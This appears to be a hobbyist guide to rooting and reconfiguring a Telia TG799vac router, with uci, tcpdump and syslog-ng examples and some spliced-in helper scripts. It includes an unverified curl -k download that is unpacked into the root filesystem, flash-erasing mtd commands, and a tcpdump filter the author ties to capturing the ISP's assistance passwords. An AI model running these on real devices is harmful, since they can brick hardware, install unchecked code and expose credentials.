ssh root@router tcpdump -i eth2 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on eth3 interface

ssh root@router tcpdump -i eth3 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on eth4 interface

ssh root@router tcpdump -i eth4 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on gre0 interface

ssh root@router tcpdump -i gre0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on gre4t-gre interface

ssh root@router tcpdump -i gre4t-gre -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on ifb0 interface

ssh root@router tcpdump -i ifb0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on ifb1 interface

ssh root@router tcpdump -i ifb1 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on ip6gre0 interface

ssh root@router tcpdump -i ip6gre0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on ip6tnl0 interface

ssh root@router tcpdump -i ip6tnl0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on sit0 interface

ssh root@router tcpdump -i sit0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on vlan_eth0 interface

ssh root@router tcpdump -i vlan_eth0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on vlan_eth1 interface

ssh root@router tcpdump -i vlan_eth1 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on vlan_eth2 interface

ssh root@router tcpdump -i vlan_eth2 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on vlan_eth3 interface

ssh root@router tcpdump -i vlan_eth3 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on vlan_iptv interface

ssh root@router tcpdump -i vlan_iptv -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on vlan_mgmt interface

ssh root@router tcpdump -i vlan_mgmt -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on vlan_voip interface

ssh root@router tcpdump -i vlan_voip -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on wl0 interface

ssh root@router tcpdump -i wl0 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on wl0_1 interface

ssh root@router tcpdump -i wl0_1 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on wl0_2 interface

ssh root@router tcpdump -i wl0_2 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on wl1 interface

ssh root@router tcpdump -i wl1 -U -s0 -w - 'not port 22'  |wireshark -k -i -   

Sniff network traffic on wl1_1 interface

ssh root@router tcpdump -i wl1_1 -U -s0 -w - 'not port 22'  |wireshark -k -i -   
  • List all IPv4 settings that have been set:
uci show \
    |grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
  • List the MAC addresses of all interfaces:
ifconfig -a \
    |sed '/eth\|wl/!d;s/ Link.*HWaddr//'
  • Output
eth0      X0:X0:X0:X0:X0:X0
eth1      X0:X0:X0:X0:X0:X0
eth2      X0:X0:X0:X0:X0:X0
eth3      X0:X0:X0:X0:X0:X0
eth4      X0:X0:X0:X0:X0:X0
eth5      X0:X0:X0:X0:X0:X0
vlan_eth0 X0:X0:X0:X0:X0:X0
vlan_eth1 X0:X0:X0:X0:X0:X0
vlan_eth2 X0:X0:X0:X0:X0:X0
vlan_eth3 X0:X0:X0:X0:X0:X0
vlan_eth5 X0:X0:X0:X0:X0:X0
wl0       X0:X0:X0:X0:X0:X0
wl0_1     X0:X0:X0:X0:X0:X0
wl0_2     X0:X0:X0:X0:X0:X0

Syslog-NG

By default the router sends its syslog notices to a server belonging to TeliaCompany AB in Solna, Sweden.

Of course this is nothing I want to do, so I send them to my own syslog server. I added some examples of how to get started on the server side so you can receive the syslogs on your own server instead.

cat << "EOF" > /etc/config/system
config system

    option log_filter_ip '192.168.1.208'
    option log_port '514'
    option hostname 'router'
    option zonename 'Europe/Stockholm'
    option timezone 'CET-1CEST,M3.5.0,M10.5.0/3'
    option network_timezone '1'
    option hw_reboot_count '0'
    option sw_reboot_count '0'
    option cronloglevel '5'

# Filters for /modals/logviewer-modal.lp and what to send to syslog-ng server

    list log_filter 'Everything'
    list log_filter 'warmboot'
    list log_filter 'cwmp'
    list log_filter 'cwmpd'
    list log_filter 'crond'
    list log_filter 'Critical'
    list log_filter 'Zonewatcher'
    list log_filter 'wifiinfo'
    list log_filter 'wifi'
    list log_filter 'mmpbxd'
    list log_filter 'transformer'
    list log_filter 'zoneredird'
    list log_filter 'zone_daemon'
    list log_filter 'syslog'
    list log_filter 'root'
    list log_filter 'premiumd'
    list log_filter 'lua'
    list log_filter 'nginx'
    list log_filter 'kernel'
    list log_filter 'ipks'
    list log_filter 'ipk'
    list log_filter 'root'
    list log_filter 'user'
    list log_filter 'mwan'
    list log_filter 'lan'
    list log_filter 'vlan'
    list log_filter 'opkg'
    list log_filter 'hostmanager'
    list log_filter 'hostapd'
    list log_filter 'fseventd'
    list log_filter 'dnsmasq-dhcp'
    list log_filter 'dnsmasq'
    list log_filter 'ddns-scripts'
    list log_filter 'awk'
    list log_filter 'assist.remote'
    list log_filter 'assist'
    list log_filter 'ash'
    list log_filter 'bash'
    list log_filter 'sh'
    list log_filter 'clash'
    list log_filter 'user.notice'
    list log_filter 'auth'
    list log_filter 'pppoe-relay-hotplug'
    list log_filter 'odhcpd'
    list log_filter 'ipsec_starter'
    list log_filter 'ipsec'
    list log_filter 'insmod'
    list log_filter 'modprobe'
    list log_filter 'rmmod'
    list log_filter 'vpn'
    list log_filter 'openvpn'
    list log_filter 'netifd'
    list log_filter 'wansensing'
    list log_filter 'miniupnpd'
    list log_filter 'user.info'
    list log_filter 'guest'
    list log_filter 'wget'
    list log_filter 'curl'
    list log_filter 'ssh'
    list log_filter 'sshd'
    list log_filter 'telnet'
    list log_filter 'http'
    list log_filter 'https'
    list log_filter 'ftp'
    list log_filter 'ftpd'
    list log_filter 'uci'
    list log_filter 'postmortem'
    list log_filter 'trafficmon.voip'

config timeserver 'ntp'
    option enable_server '1'
    option program '/sbin/firstusedate'
    list server 'ntp1.rgw.telia.se'
    list server 'ntp2.rgw.telia.se'
    list server '0.se.pool.ntp.org'
    list server '1.se.pool.ntp.org'
    list server '2.se.pool.ntp.org'
    list server '3.se.pool.ntp.org'
    list server 'time.google.com'
    list server 'time1.google.com'
    list server 'time2.google.com'
    list server 'time3.google.com'
    list server 'time4.google.com'

config config config
     option export_plaintext  '1'
     option export_unsigned   '1'
     option import_plaintext  '1'
     option import_unsigned   '1'
     option usb_filesystem_charset 'utf8'

config coredump
    option path '/root'
    option url 'https://telia-core.tgwfd.org:5443/'
    option action 'ignore'
    option reboot '0'

config log 'logread'
    option path 'logread'

config trafficmon
    option interface 'wan'
    option minute '*/720'

config trafficmon
    option interface 'mgmt'
    option minute '*/720'

config trafficmon
    option interface 'voip'
    option minute '*/720'

config trafficmon
    option interface 'iptv'
    option minute '*/720'
    option sw_reboot_count '0'

config time 'time'
EOF
  • Now restart the system init script and it's done:
/etc/init.d/system restart
  • This is a simple server configuration for Gentoo Linux, since that is the only distro I am using, but no worries, it will probably work for most others too, though extra configuration may be needed for other distros.

Just fyi, I won't give any support at all for any other distros than Gentoo and Funtoo, so please keep that in mind: if you are using something else this is just an example, ask your community if you get problems and want to get it up and running. However, this should be fine for everyone to get started (don't be a fool and send your logs to some random server online, use your own of course, that's what I do).

Screenshot

@version: 3.30
@include "scl.conf"

options {
create_dirs(yes);
owner(wuseman);
group(wuseman);
perm(0644);
dir_owner(wuseman);
dir_group(wuseman);
dir_perm(0755);
};
 
 
source s_udp {
network (
ip-protocol(6)
transport("udp")
port(514)
);
network (
transport("udp")
port(514)
);
};

destination d_host-specific {
file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog.log");
};

log {
source(s_udp);
destination(d_host-specific);
};


source src {
unix-stream("/dev/log" max-connections(256));
internal();
};

source kernsrc { file("/proc/kmsg"); };

# define destinations
destination authlog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-auth.log"); };
destination syslog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog"); };
destination cron { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-cron.log"); };
destination daemon { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-daemon.log"); };
destination kern { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-kern.log"); };
destination lpr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-lpr.log"); };
destination user { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-user.log"); };
destination mail { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.log"); };
destination mailinfo { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.info"); };
destination mailwarn { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.warn"); };
destination mailerr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.err"); };
destination newscrit { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.crit"); };
destination newserr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.err"); };
destination newsnotice { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.notice"); };
destination debug { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-debug"); };
destination messages { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-messages"); };
destination console { usertty("root"); };
destination console_all { file("/dev/tty12"); };
#destination console_all { file("/dev/console"); };
filter f_authpriv { facility(auth, authpriv); };
filter f_syslog { not facility(authpriv, mail); };
filter f_cron { facility(cron); };
filter f_daemon { facility(daemon); };
filter f_kern { facility(kern); };
filter f_lpr { facility(lpr); };
filter f_mail { facility(mail); };
filter f_user { facility(user); };
filter f_debug { not facility(auth, authpriv, news, mail); };
filter f_messages { level(info..warn)
and not facility(auth, authpriv, mail, news); };
filter f_emergency { level(emerg); };
filter f_info { level(info); };
filter f_notice { level(notice); };
filter f_warn { level(warn); };
filter f_crit { level(crit); };
filter f_err { level(err); };
filter f_failed { message("failed"); };
filter f_denied { message("denied"); };

# connect filter and destination
log { source(src); filter(f_authpriv); destination(authlog); };
log { source(src); filter(f_syslog); destination(syslog); };
log { source(src); filter(f_cron); destination(cron); };
log { source(src); filter(f_daemon); destination(daemon); };
log { source(kernsrc); filter(f_kern); destination(kern); };
log { source(src); filter(f_lpr); destination(lpr); };
log { source(src); filter(f_mail); destination(mail); };
log { source(src); filter(f_user); destination(user); };
log { source(src); filter(f_mail); filter(f_info); destination(mailinfo); };
log { source(src); filter(f_mail); filter(f_warn); destination(mailwarn); };
log { source(src); filter(f_mail); filter(f_err); destination(mailerr); };
log { source(src); filter(f_debug); destination(debug); };
log { source(src); filter(f_messages); destination(messages); };
log { source(src); filter(f_emergency); destination(console); };

# default log
log { source(src); destination(console_all); };
  • Now restart the system init script on your router and you should see messages arriving:
/etc/init.d/system restart
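Added example, not from this wiki: a small POSIX sh helper that decodes the <PRI> field of the RFC 3164 lines the router forwards over UDP 514 and files each line the way the syslog-ng destinations above do, one directory per host and day and one file per facility. It is useful for checking what the facility() filters in the config will actually match for a given router line. The sample lines are constructed, not captured from a device, and the hostname 'router' and the date are assumptions.

```shell
#!/bin/sh
# Added example (not from this wiki): decode the <PRI> of RFC 3164 syslog lines as the
# router sends them over UDP 514, and file them the way the syslog-ng config above does
# (one directory per host and day). Sample lines are constructed, not captured.

# PRI = facility * 8 + severity, so facility = PRI / 8 and severity = PRI % 8.
syslog_pri() {
    pri=${1#<}
    echo "${pri%%>*}"
}

syslog_facility() {
    echo $(( $(syslog_pri "$1") / 8 ))
}

syslog_severity() {
    echo $(( $(syslog_pri "$1") % 8 ))
}

# Facility numbers to the names the syslog-ng filters above use (auth, authpriv, ...).
facility_name() {
    case "$1" in
        0) echo kern ;;      1) echo user ;;     2) echo mail ;;
        3) echo daemon ;;    4) echo auth ;;     5) echo syslog ;;
        6) echo lpr ;;       7) echo news ;;     9) echo cron ;;
        10) echo authpriv ;;
        16|17|18|19|20|21|22|23) echo "local$(( $1 - 16 ))" ;;
        *) echo "facility$1" ;;
    esac
}

# route_line BASEDIR HOST DAY LINE: append LINE to BASEDIR/HOST/DAY/HOST-<facility>.log
# (the $HOST/$YEAR-$MONTH-$DAY layout of the syslog-ng destinations) and print that path.
route_line() {
    base=$1; host=$2; day=$3; line=$4
    fac=$(facility_name "$(syslog_facility "$line")")
    mkdir -p "$base/$host/$day"
    printf '%s\n' "$line" >> "$base/$host/$day/$host-$fac.log"
    echo "$base/$host/$day/$host-$fac.log"
}

# Demo with constructed lines in the shape a TG799vac emits (hostname 'router' assumed).
demo() {
    base=$(mktemp -d)
    route_line "$base" router 2022-01-15 '<38>Jan 15 10:00:01 router dropbear[1234]: Password auth succeeded for root from 192.168.1.10:51234'
    route_line "$base" router 2022-01-15 '<30>Jan 15 10:00:02 router dnsmasq-dhcp[567]: DHCPACK(br-lan) 192.168.1.10 aa:bb:cc:dd:ee:ff'
    route_line "$base" router 2022-01-15 '<4>Jan 15 10:00:03 router kernel: [  123.456] eth4: link up'
}

demo
```

Running it prints the three files the lines land in (router-auth.log, router-daemon.log, router-kern.log); a line whose facility you did not expect is a sign the matching filter in syslog-ng needs adjusting.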
  • Enable or disable Time of Day ACL rules ('1' enables, '0' disables):
uci set tod.global.enabled='0'
  • To log in with debug mode enabled, go to (probably not possible, but worth a try):
http://192.168.1.1/?debug=1
  • Enable or disable rebooting the router when a user space program hits a segmentation fault:
uci set system.@coredump[0].reboot='0'
uci commit system

Type the command below to print the access key (it prints the first 8 characters of /proc/rip/0124):

sed -e 's/^\(.\{8\}\).*/\1/' /proc/rip/0124

You can check the current running dns with

cat /etc/resolv.conf

Enable or disable Content Sharing (Samba / DLNA):

uci set samba.samba.enabled='1'
uci set dlnad.config.enabled='1'

Enable or disable Time of Day ACL rules ('1' enables, '0' disables):

uci set tod.global.enabled='1'

To disable the mobile card, since there is no button for it, run:

uci set mobiled.device_defaults.enabled=0
uci commit

List installed packages:

opkg list_installed 

Add a new modal (the name and the target path below are placeholders; the steps follow the same order as for the Telia modals further down: rule, ruleset entry, target, then roles):

uci set web.l2tpipsecservermodal=rule
uci add_list web.ruleset_main.rules=l2tpipsecservermodal
uci set web.l2tpipsecservermodal.target='/modals/modals-name.lp'
uci add_list web.l2tpipsecservermodal.roles='admin'

A minimal alias definition for a bridged interface might be:

config interface lan
    option 'ifname' 'eth0'
    option 'type' 'bridge'
    option 'proto' 'static'
    option 'ipaddr' '192.168.1.1'
    option 'netmask' '255.255.255.0'

config interface lan2
    option 'ifname' 'br-lan'
    option 'proto' 'static'
    option 'ipaddr' '10.0.0.1'
    option 'netmask' '255.255.255.0'

For a non-bridged interface:

config interface lan
    option 'ifname' 'eth0'
    option 'proto' 'static'
    option 'ipaddr' '192.168.1.1'
    option 'netmask' '255.255.255.0'

config interface lan2
    option 'ifname' 'eth0'
    option 'proto' 'static'
    option 'ipaddr' '10.0.0.1'
    option 'netmask' '255.255.255.0'

Use your TG799 router as a switch instead of a router:

Here is my example for using all ports for the local network and also the WAN port (5):

cat << "EOF" > /etc/config/network
config 'switch' 'eth0'
    option 'enable' '1'

# wan
config 'switch_vlan' 'eth0_0'
    option 'device' 'eth0'
    option 'vlan' '0'
    option 'ports' '4 5'

# lan 1
config 'switch_vlan' 'eth0_1'
    option 'device' 'eth0'
    option 'vlan' '1'
    option 'ports' '3 5'

# lan 2
config 'switch_vlan' 'eth0_2'
    option 'device' 'eth0'
    option 'vlan' '2'
    option 'ports' '2 5'

# lan 3
config 'switch_vlan' 'eth0_3'
    option 'device' 'eth0'
    option 'vlan' '3'
    option 'ports' '1 5'

# lan 4
config 'switch_vlan' 'eth0_4'
    option 'device' 'eth0'
    option 'vlan' '4'
    option 'ports' '0 5'
EOF

Create a backup of all /dev/mtd[0-7]

Insert a USB stick formatted as ext2, ext3 or ext4 and make sure it is mounted, then run:

# Find the mount point of the first mounted USB partition (field 2 of /proc/mounts)
usb_mount=$(grep -m1 '^/dev/sd[a-z][0-9] ' /proc/mounts | cut -d' ' -f2)
if [ -z "$usb_mount" ]; then
    echo "No USB partition mounted" >&2
else
    mkdir -p "${usb_mount}/backup_mtd"
    for number in $(seq 0 7); do
        # Raw copy of each MTD partition onto the stick
        dd if="/dev/mtd${number}" of="${usb_mount}/backup_mtd/mtd${number}.img"
    done
fi
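Added example, not from this wiki: after the dd loop above, check that every mtdN.img on the stick is byte-for-byte identical to its /dev/mtdN source before relying on it, and locate the USB mount point by parsing a /proc/mounts style table. The functions take file paths so the demo runs on a constructed mount table and constructed "partition" files instead of a live router; the mount point /mnt/usb/sda1 in the demo is an assumption.

```shell
#!/bin/sh
# Added example (not from this wiki): locate the mounted USB partition from a /proc/mounts
# style file and verify that each mtdN.img written by the dd loop above matches its source,
# so a silently truncated backup is caught before the flash is touched. The mount table
# and the "flash" images used in the demo are constructed files, not real devices.

# usb_mount_point MOUNTS_FILE: mount point (field 2) of the first /dev/sd?N entry.
usb_mount_point() {
    grep -m1 '^/dev/sd[a-z][0-9] ' "$1" | cut -d' ' -f2
}

# verify_backup SRC_DIR DST_DIR LAST: compare SRC_DIR/mtdN with DST_DIR/mtdN.img for
# N = 0..LAST; prints the names that differ (or are missing) and returns 1 if any do.
verify_backup() {
    src=$1; dst=$2; last=$3; bad=0
    n=0
    while [ "$n" -le "$last" ]; do
        if cmp -s "$src/mtd$n" "$dst/mtd$n.img"; then
            :
        else
            echo "mtd$n"
            bad=1
        fi
        n=$(( n + 1 ))
    done
    return $bad
}

# Demo: a constructed mount table and three fake partitions, one backed up incompletely.
demo() {
    work=$(mktemp -d)
    printf '%s\n' \
        '/dev/root / squashfs ro,relatime 0 0' \
        'tmpfs /tmp tmpfs rw,nosuid,nodev,noatime 0 0' \
        '/dev/sda1 /mnt/usb/sda1 ext4 rw,relatime 0 0' > "$work/mounts"
    mkdir -p "$work/dev" "$work/backup_mtd"
    for n in 0 1 2; do
        yes "$n" | head -c 4096 > "$work/dev/mtd$n"
        cp "$work/dev/mtd$n" "$work/backup_mtd/mtd$n.img"
    done
    head -c 100 "$work/dev/mtd2" > "$work/backup_mtd/mtd2.img"   # truncated copy
    echo "usb mounted at: $(usb_mount_point "$work/mounts")"
    verify_backup "$work/dev" "$work/backup_mtd" 2 || echo "backup incomplete"
}

demo
```

On the router itself you would call `verify_backup /dev "$usb_mount/backup_mtd" 7` after the dd loop; cmp reads the MTD devices read-only, so the check does not touch the flash.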

Result for: 17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628:

 mtd1.img: Squashfs filesystem, little endian, version 4.0, xz compressed, 29719215 bytes, 3791 inodes, blocksize: 262144 bytes, created: Tue May  2 15:59:58 2017
 mtd2.img: ISO-8859 text, with very long lines (65536), with no line terminators
 mtd3.img: data
 mtd4.img: data
 mtd5.img: data
 mtd6.img: data

Just mount mtd1 and play around:

Screenshot

squashfuse mtd1.img /mnt/router/justforfun

Using bridge mode with a dedicated PPPoE ethernet port

uci set network.lan.dns='1.1.1.1'
uci set network.lan.gateway='192.168.0.254'
uci set mmpbxrvsipnet.sip_net.interface='lan'
uci set mmpbxrvsipnet.sip_net.interface6='lan6'

Add the things below in the same order as I posted them to avoid errors.

List all roles admin is not added to:

uci show|grep \.roles \
    |grep -v admin

Generate the matching uci add_list commands for those roles:

uci show \
    |grep \.roles \
    |grep -v admin \
    |cut -d'=' -f1 \
    |sed 's/^/uci add_list /g' \
    |sed 's/$/=admin/g'

So, now we want to add admin to the roles above so we can access the same cards as superuser and telia.

The new settings must be added in this order so the cards become accessible in the web UI:

Rule > Ruleset > Modal > Target

Set web Rules

uci set web.natalghelpermodal=rule
uci set web.relaymodal=rule
uci set web.systemmodal=rule
uci set web.iproutesmodal=rule
uci set web.mmpbxinoutgoingmapmodal=rule
uci set web.ltedoctor=rule
uci set web.ltemodal=rule
uci set web.lteprofiles=rule
uci set web.ltesim=rule
uci set web.ltesms=rule
uci set web.logconnections=rule
uci set web.logviewer=rule
uci set web.logviewer.roles=rule
uci set tod.global.enabled='1'
uci set mobiled.globals.enabled='1'
uci set mobiled.device_defaults.enabled='1'

uci commit; /etc/init.d/nginx restart

Set rulesets

uci add_list web.ruleset_main.rules=xdsllowmodal
uci add_list web.ruleset_main.rules=systemmodal
uci add_list web.ruleset_main.rules=diagnostics
uci add_list web.ruleset_main.rules=basicviewaccesscodemodal
uci add_list web.ruleset_main.rules=basicviewwifiguestmodal
uci add_list web.ruleset_main.rules=basicviewwifiguest5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifipskmodal
uci add_list web.ruleset_main.rules=basicviewwifipsk5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifissidmodal
uci add_list web.ruleset_main.rules=basicviewwifissid5GHzmodal
uci add_list web.ruleset_main.rules=relaymodal
uci add_list web.ruleset_main.rules=iproutesmodal
uci add_list web.ruleset_main.rules=mmpbxstatisticsmodal

uci commit; /etc/init.d/nginx restart

Set modal targets

uci set web.mmpbxinoutgoingmapmodal.target='/modals/mmpbx-inoutgoingmap-modal.lp'
uci set web.iproutesmodal.target='/modals/iproutes-modal.lp'
uci set web.systemmodal.target='/modals/system-modal.lp'
uci set web.relaymodal.target='/modals/relay-modal.lp'
uci set web.natalghelpermodal.target='/modals/nat-alg-helper-modal.lp'
uci set web.diagnosticstcpdumpmodal.target='/modals/diagnostics-tcpdump-modal.lp'
uci set web.basicviewaccesscodemodal.target='/modals/basicview-accesscode-modal.lp'
uci set web.basicviewwifiguestmodal.target='/modals/basicview-wifiguest-modal.lp'
uci set web.basicviewwifiguest5GHzmodal.target='/modals/basicview-wifiguest5GHz-modal.lp'
uci set web.basicviewwifipskmodal.target='/modals/basicview-wifipsk-modal.lp'
uci set web.basicviewwifipsk5GHzmodal.target='/modals/basicview-wifipsk5GHz-modal.lp'
uci set web.basicviewwifissidmodal.target='/modals/basicview-wifissid-modal.lp'
uci set web.basicviewwifissid5GHzmodal.target='/modals/basicview-wifissid5GHz-modal.lp'
uci set web.ltemodal.target='/modals/lte-modal.lp'
uci set web.ltedoctor.target='/modals/lte-doctor.lp'
uci set web.lteprofiles.target='/modals/lte-profiles.lp'
uci set web.logconnections.target='/modals/log-connections-modal.lp'
uci set web.logviewer.target='/modals/logviewer-modal.lp'
uci set web.ltesms.target='/modals/lte-sms.lp'
uci set web.ltesim.target='/modals/lte-sim.lp'
uci set web.xdsllowmodal.target='/modals/xdsl-low-modal.lp'

uci commit; /etc/init.d/nginx restart

Now add admin to get access to the new rules

Show all rules where we want to add ourselves (admin):

uci show|grep -i roles|grep -v admin
uci add_list web.uidefault.upgradefw_role=admin
uci add_list web.assistancemodal.roles='admin'
uci add_list web.usermgrmodal.roles='admin'
uci add_list web.todmodal.roles='admin'
uci add_list web.iproutesmodal.roles='admin'
uci add_list web.cwmpconf.roles='admin'
uci add_list web.relaymodal.roles='admin'
uci add_list web.systemmodal.roles='admin'
uci add_list web.natalghelper.roles='admin'
uci add_list web.xdsllowmodal.roles='admin'
uci add_list web.mmpbxprofilemodal.roles='admin'
uci add_list web.ltesms.roles='admin'

uci commit

/etc/init.d/nginx restart
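Added example, not from this wiki: a generator for the four uci commands a new modal needs, emitted in the Rule > Ruleset > Target > Roles order the wiki requires, plus a check that lists every .roles entry in a uci show dump that still lacks admin. Generating the lines instead of typing them avoids the copy-paste slips a long hand-written list of uci set invites. The modal name and target path in the demo are placeholders, and the uci show excerpt is constructed.

```shell
#!/bin/sh
# Added example (not from this wiki): generate the uci commands for exposing one more
# modal to the admin role in the order the wiki requires (rule, ruleset entry, target,
# roles), and check a `uci show` dump for roles lists that still lack a role.
# The modal name and target path passed to the demo are placeholders.

# modal_commands NAME TARGET [ROLE]: print the four uci commands, in order, followed by
# the commit/restart line; nothing is executed, so the output can be reviewed first.
modal_commands() {
    name=$1; target=$2; role=${3:-admin}
    printf '%s\n' \
        "uci set web.$name=rule" \
        "uci add_list web.ruleset_main.rules=$name" \
        "uci set web.$name.target='$target'" \
        "uci add_list web.$name.roles='$role'" \
        "uci commit; /etc/init.d/nginx restart"
}

# roles_missing ROLE < uci-show-output: print the option path of every .roles list
# that does not contain ROLE as a quoted list item (the same test as the grep -v
# pipeline above, but only matching whole quoted items).
roles_missing() {
    role=$1
    grep '\.roles=' | grep -v "'$role'" | cut -d'=' -f1
}

# Demo on a constructed uci show excerpt.
demo() {
    modal_commands l2tpipsecservermodal /modals/l2tp-ipsec-server-modal.lp
    echo '--- roles lists without admin ---'
    printf '%s\n' \
        "web.systemmodal.roles='admin' 'superuser' 'telia'" \
        "web.xdsllowmodal.roles='superuser' 'telia'" \
        "web.usermgrmodal.roles='admin'" \
        "web.cwmpconf.roles='telia'" \
        | roles_missing admin
}

demo
```

Usage on the router: `uci show web | roles_missing admin` to see what is still closed to admin, and `modal_commands NAME TARGET | sh` once the printed lines have been reviewed.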

If the web GUI ever gets broken because you fucked it up, reset the router with 'rtfd --all' (same as pressing the reset button).

If you want to keep files and just reset settings then use 'rtfd --soft' instead.

Screenshot

  • No space left and no commands work at all? Not even rtfd?

Run the command below for a full factory reset

Screenshot

This works for all TG799vac devices from TeliaCompany AB EXCEPT the vdnt-o router; vdnt-o is the first generation that was released. Feel free to ask if you are not 100% sure which router you have, I or someone else will help you so you know for sure.

mtd -r erase rootfs_data

Just for VDNT-O

mtd -r erase userfs

Remove telia from all roles:

uci show|egrep -i "roles.*telia"|cut -d'=' -f1|sed 's/$/=telia/g'|xargs uci del_list

Once you have added the above you can browse to system-modal.lp and enable/disable ssh or put the router in bootp mode:

Screenshot

.... or enable/disable assistance on your own, and just give the credentials to telia when needed. Feels better? :)

Change port:

assistance_port="$(uci get mwan.remoteassist.dest_ip | cut -d'/' -f1)"
uci set web.remote.port='<port>'

Screenshot

Are you a sneaky bastard like myself? Cool! This is not far from how I got their passwords at the top of this README. Figure out that part yourself.

tcpdump \
    -i vlan_mgmt \
    -s 0 \
    -A 'tcp dst port <assistance_port>
        or tcp dst port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420
        or tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504F5354
        and host <vlan_mgmt_ip>'

What does this mean? I won't go deep into this part, please visit https://www.nr1.nu/ for deep tutorials on tcpdump and tshark via the CLI; this is just an example of how to grab GET requests. See the example below:

Here 0x47455420 is the ASCII value of the characters 'G' 'E' 'T' ' ':

Character   ASCII value (hex)
G           47
E           45
T           54
SPACE       20

Failsafe boot, board vdnt-o

Time(Seconds) Event
00-00 Press start
00-45 Let it boot until 45s
46-60 Press Reset button
Round 2
00-00 Press start
00-45 Let it boot until 45s
46-60 Press Reset button
Round 3
00-00 Press start
00-45 Let it boot until 45s
46-60 Press Reset button
Round 4
00-00 Press start
00-45 Let it boot until 45s
46-60 Press Reset button
..... DONE

If everything was done correctly the router has switched bank, but only temporarily (until the next reboot); to keep it, ssh into the device and change the bank with the command below:

echo "bank_1" > /proc/bankversion/active 

Failsafe boot, board vbnt-h

Time(Seconds) Event
00-00 Press start
00-25 Let it boot until 25s
25-45 Press Reset button
Round 2
00-00 Press start
00-25 Let it boot until 25s
25-45 Press Reset button
Round 3
00-00 Press start
00-25 Let it boot until 25s
25-45 Press Reset button
Round 4
00-00 Press start
00-25 Let it boot until 25s
25-45 Press Reset button
..... DONE

If everything was done correctly the router has switched bank, but only temporarily (until the next reboot); to keep it, ssh into the device and change the bank with the command below:

echo "bank_1" > /proc/bankversion/active 

System and Firmware Upgrade

  • Upgrade firmware from CLI:
sysupgrade --safe -o /tmp/172339o1901024closed.rbi
  • Default view:

Screenshot

  • This is all modals that are available from Telias devices in /www/docroot when all are enabled:

Screenshot

  • Add the Administrator user to the roles allowed to upgrade firmware:
uci add_list web.uidefault.upgradefw_role='admin'
uci commit
  • If you try the command below you will know how it feels to work for telia support:

This part has been moved to its own directory WILLGETADDEDSOON

uci set web.usr_Administrator.role='superuser'
uci set web.usr_Administrator.role='telia'
  • System Modal

Screenshot

  • Default banner

Screenshot

  • When you have root access on your router you will be able to unlock rootfs_data and install a very powerful GUI compared to the original from TeliaCompany AB, thanks to @Ansuel and all the other developers who have worked so hard to make this available:
curl -k https://repository.ilpuntotecnico.com/files/Ansuel/AGTEF/GUI.tar.bz2 --output /tmp/GUI.tar.bz2; 
bzcat /tmp/GUI.tar.bz2 | tar -C / -xvf -;
/etc/init.d/rootdevice force; 
reboot
  • This is how it will look after you run the above commands and the router has rebooted:

Screenshot

  • Stats view:

Screenshot

  • Telstra Extension:

Screenshot

Screenshot

  • Current bank setup
grep . -r /proc/banktable/
/proc/banktable/notbootedoid:Unknown
/proc/banktable/bootedoid:5dcd7b8d4f5d980688c30569
/proc/banktable/passiveversion:17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628
/proc/banktable/activeversion:Unknown
/proc/banktable/inactive:bank_2
/proc/banktable/active:bank_1
/proc/banktable/notbooted:bank_1
/proc/banktable/booted:bank_2
  • Setup Ultimate Bank Plan

According to

# Ensure two banks match in sizes
[ $(grep -c bank_ /proc/mtd) = 2 ] && \
[ "$(grep bank_1 /proc/mtd | cut -d' ' -f2)" = \
